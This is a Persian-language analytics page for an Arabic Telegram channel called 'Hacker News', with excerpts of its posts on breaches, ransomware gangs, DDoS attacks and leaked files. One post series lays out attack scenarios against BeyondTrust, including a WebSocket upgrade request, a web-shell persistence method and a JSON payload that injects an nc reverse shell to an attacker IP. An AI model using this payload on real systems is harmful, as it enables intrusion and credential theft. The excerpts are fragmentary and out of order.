Hacker News
المصدر العربي الأول لأخبار الهاكرز و ملتقى الأحرار و المناضلين صفحتنا الأولى https://www.facebook.com/HackerNews2
نمایش بیشتر📈 تحلیل کانال تلگرام Hacker News
کانال Hacker News (@hackernewsar) در بخش زبانی عربی بازیگری فعال است. در حال حاضر جامعه شامل 13 295 مشترک است و جایگاه 9 603 را در دسته فناوری و برنامهها و رتبه 5 757 را در منطقه المملكة العربية السعودية دارد.
📊 شاخصهای مخاطب و پویایی
از زمان ایجاد در невідомо، پروژه رشد سریعی داشته و 13 295 مشترک جذب کرده است.
بر اساس آخرین دادهها در تاریخ 24 ژوئن, 2026، کانال فعالیت پایداری دارد. در ۳۰ روز گذشته تغییر اعضا برابر 3 و در ۲۴ ساعت گذشته برابر 6 بوده و همچنان دسترسی گستردهای حفظ شده است.
- وضعیت تأیید: تأیید نشده
- نرخ تعامل (ER): میانگین تعامل مخاطب 15.87% است و در ۲۴ ساعت نخست پس از انتشار، محتوا معمولاً 5.13% واکنش نسبت به کل مشترکان کسب میکند.
- دسترسی پستها: هر پست به طور میانگین 2 110 بازدید دریافت میکند. در اولین روز معمولاً 682 بازدید جمعآوری میشود.
- واکنشها و تعامل: مخاطبان بهطور فعال حمایت میکنند؛ میانگین واکنش به هر پست 21 است.
- علایق موضوعی: محتوا بر موضوعات کلیدی مانند نِظَام, شَرِكَة, اِختِرَاق, مَجمُوعَة, بَيَان تمرکز دارد.
📝 توضیح و سیاست محتوایی
نویسنده این فضا را محل بیان دیدگاههای شخصی توصیف میکند:
“المصدر العربي الأول لأخبار الهاكرز و ملتقى الأحرار و المناضلين
صفحتنا الأولى https://www.facebook.com/HackerNews2”
به لطف بهروزرسانیهای پرتکرار (آخرین داده در تاریخ 25 ژوئن, 2026)، کانال همواره بهروز و دارای دسترسی بالاست. تحلیلها نشان میدهد مخاطبان بهطور فعال با محتوا تعامل دارند و آن را به نقطه اثرگذاری مهم در دسته فناوری و برنامهها تبدیل کردهاند.
وأعرب رئيس الوزراء النيوزيلندي كريستوفر لوكسون عن قلقه البالغ حيال الحادثة، داعياً إلى تشديد قوانين الأمن السيبراني في البلاد، وأكدت السلطات الصحية في نيوزيلندا والشرطة أن الأولوية القصوى حالياً هي سلامة المرضى والتحقق من صحة البيانات قبل إعادة تشغيل النظام.#HackerNews #MediMap #CharlieKirk
ملاحظة: يمتلك دونالد ترامب منتجع وفندق فاخر (5 نجوم) يضم أجنحة وشققاً فندقية في لاس فيغاس.#HackerNews #ShinyHunters
* سبب الاختیار: أنظمة BeyondTrust ھي "بنوك كلمات مرور". الحصول على صلاحیة RCE یعني إمكانیة فك تشفیر كلمات المرور المخزنة والوصول إلى بقیة خوادم الشركة دون إثارة أي إنذار.3 سيناريو التخفي والبقاء (Persistence via Web Shell): یھدف المھاجم ھنا لضمان العودة للجھاز حتى لو قامت الشركة بإعادة تشغیله أو تغییر كلمات المرور. - الأدوات المستخدمة: بوابة خلفیة بسیطة (Web Shell) مكتوبة بـ PHP أو Python. - آلیة العمل: یرسل المھاجم أمراً عبر الـ WebSocket یقوم بإنشاء ملف جدید في مسار الویب الخاص بالمنصة مثلاً : /usr/share/web/shell.php یحتوي ھذا الملف على سطر برمجي واحد یسمح للمھاجم بإرسال أوامر عبر المتصفح مباشرة.
* سبب الاختیار: الـ Shell Web یمنح المھاجم "رابطاً سریاً" خاصاً به. حتى لو أغلق المھاجم اتصال الـ WebSocket الأول، یمكنه العودة في أي وقت عبر طلب HTTP بسیط للمسار الذي أنشأه.4 سیناریو "الاستطلاع الداخلي" (Internal Scanning) : استخدام جھاز BeyondTrust كـ "قفزة" للھجوم على الشبكة الداخلیة التي لا تظھر على الإنترنت. - الأدوات المستخدمة: Nmap أو سكربتات Bash مخصصة للمسح. - آلیة العمل: یقوم المھاجم بتحمیل أداة Nmap على جھاز BeyondTrust المخترق، ثم یأمره بمسح الأجھزة المجاورة له في الشبكة المحلیة (مثل أجھزة المدیر المالي أو خوادم البیانات).
* سبب الاختیار: جھاز BeyondTrust موثوق به داخل الشبكة، فعملیات المسح القادمة منه لن تبدو مشبوھة لأنظمة الأمان الداخلیة وليس كما لو كانت قادمة من عنوان IP خارجي.#HackerNews #BeyondTrust
* سبب الاختیار: لأن الـ Reverse Shell یجعل جھاز الضحیة ھو من "یتصل" بالمھاجم، وھو ما تسمح بھ معظم جدران الحمایة (Outbound Traffic)، مما یضمن للمھاجم بقاء الاتصال مستقراً لفترة طویلة.#HackerNews #BeyondTrust
GET /nw HTTP/1.1 Host: [Target_IP] Upgrade: websocket Connection: Upgrade Sec-WebSocket-Key: [Random_Key] Sec-WebSocket-Version: 13بمجرد رد الخادم بـ Protocols Switching 101 ، یصبح الطریق مفتوحاً لإرسال "الحمولات" (Payloads) مباشرة إلى المعالج الداخلي دون قیود HTTP التقلیدیة. إرسال الحمولة (بعد الترقیة): بعد نجاح الترقیة، یرسل المھاجم رسالة بصیغة JSON عبر قناة الـ WebSocket المفتوحة:
{"remoteVersion": "$(nc -e /bin/sh [Attacker_IP] [Port])"}
ھنا یظن النظام أنه یستلم "رقم إصدار"، لكن بسبب استخدام Evaluation Arithmetic Bash بشكل غیر آمن، یقوم النظام بتنفیذ الأمر الموجود بین القوسین (...)$ فورا،ً مما یعطي المھاجم "صلاحیة الوصول الكاملة" (Shell Reverse) BeyondTrust Release Notes .
#HackerNews
#BeyondTrustوشملت البيانات المسروقة: -بيانات العملاء: هويات الشركات التي تتعامل معها، العقود، والأرقام الضريبية. -التقارير المالية: ميزانيات الشركات، كشوفات الرواتب، والحسابات البنكية. -أسرار تجارية: استشارات قانونية ومالية حساسة.تستخدم مجموعة الهاكرز Tengu أسلوب "الابتزاز المزدوج" حيث تقوم بتشفير الملفات مما يجعل من المستحيل فتحها، وتطلب "فدية" مالية بالعملات الرقمية مقابل عدم نشر هذه البيانات. استهدفت مجموعة Tengu منذ ظهورها لأول مرة في 21 أكتوبر 2025 أكثر من 43 ضحية حول العالم، تركز بشكل كبير على قطاعات التصنيع، التكنولوجيا، الخدمات اللوجستية، والمحاسبة. #HackerNews #Tengu #DarkWeb
-بيانات الحساب: أرقام الحسابات الدولية (IBAN/RIB) -نوع الحسابات (جاري، ادخار، أوراق مالية) واسم البنك. -بيانات صاحب الحساب: الاسم الكامل، تاريخ ومكان الميلاد، والعنوان. -الحالات: تواريخ فتح الحساب أو إغلاقه أو تعديله. -الأرقام الضريبية.وصفت وزارة الاقتصاد والمديرية العامة للمالية العامة (DGFiP) المنفذ بأنه "طرف خبيث" (Malicious actor) استخدم هويات رقمية مسروقة تخص أحد الموظفين الحكوميين للوصول إلى النظام. وبدأت الوزارة بإبلاغ الأشخاص المتضررين بشكل شخصي، وتم تقديم شكوى جنائية وإبلاغ هيئة حماية البيانات الفرنسية (CNIL). #HackerNews
تتعلق الثغرة بأنظمة المؤسسات (Enterprise Systems) الضخمة، وليست أجهزة استهلاكية (مثل اللاب توب). تستهدف البنية التحتية لمراكز البيانات (Data Centers).#HackerNews #CVE_2026_22769 #رمضان_مبارك
وجه المسؤولون في كييف أصابع الاتهام إلى مجموعات مرتبطة بروسيا أو مجموعات تعمل لصالحها، في هجمات مماثلة سابقة وقعت في فبراير، نُسبت العمليات لمجموعات مثل "NoName057(16)"، وهي مجموعة تنشط في تنفيذ هجمات حجب الخدمة (DDoS).#HackerNews
تشير التقديرات الأولية إلى وصول المهاجمين إلى بيانات شخصية للعملاء تشمل الأسماء، وأرقام الهواتف، والبريد الإلكتروني، وعناوين الشحن، و تم إيقاف المتجر مؤقتاً لإجراء التحقيقات وتقييم الأضرار الناتجة عن هذا النوع من الهجمات المعروف بـ "هجوم سلاسل التوريد".فيما واجه بنك "A-Bank" إلى جانب بنوك ومؤسسات مالية أخرى هجمات من نوع "حجب الخدمة الموزعة" (DDoS)، مما أدى إلى تعطل مؤقت في خدمات الدفع عبر الإنترنت، وتطبيقات الهاتف المحمول، وعمليات السحب من أجهزة الصراف الآلي. #HackerNews
مجموعة The Gentlemen هي مجموعة برمجيات فدية ظهرت بنشاط متزايد منذ أواخر عام 2025، وتستخدم تقنيات متطورة مثل استغلال برامج تشغيل ويندوز (Windows drivers) والتلاعب بسياسات المجموعات (GPO) لتجاوز الدفاعات الأمنية. سجلت المجموعة 128 ضحية حول العالم حتى أوائل فبراير 2026.يأتي هذا الهجوم تزامناً مع إعلان مجلس الأمن السيبراني لحكومة الإمارات في 18 فبراير 2026 عن آلاف محاولات الاختراق يومياً، مشيراً إلى أن قطاعي النقل والخدمات المالية هما من بين الأكثر استهدافاً منذ بداية العام. #HackerNews #TheGentlemen
أمضى موقع Drop Site News الأشهر الماضية في كشف صلات إبستين بالمخابرات الأمريكية والإسر*ائيلية. و بالتعاون مع موقع Jmail لجعل ملفات إبستين الكاملة متاحة وقابلة للبحث.#HackerNews #DropSiteNews #Jmail #EPSTEIN
وسعى إبستين من خلال المشروع إلى تطوير أدوات استخباراتية جديدة تهدف إلى "اعتراض" وفهم الاتصالات والرسائل المتبادلة بين الخلايا الحية داخل الكائنات الحية.#HackerNews #DropSiteNews #Jmail #EPSTEIN
اکنون در دسترس! پژوهش تلگرام ۲۰۲۵ — مهمترین بینشهای سال 
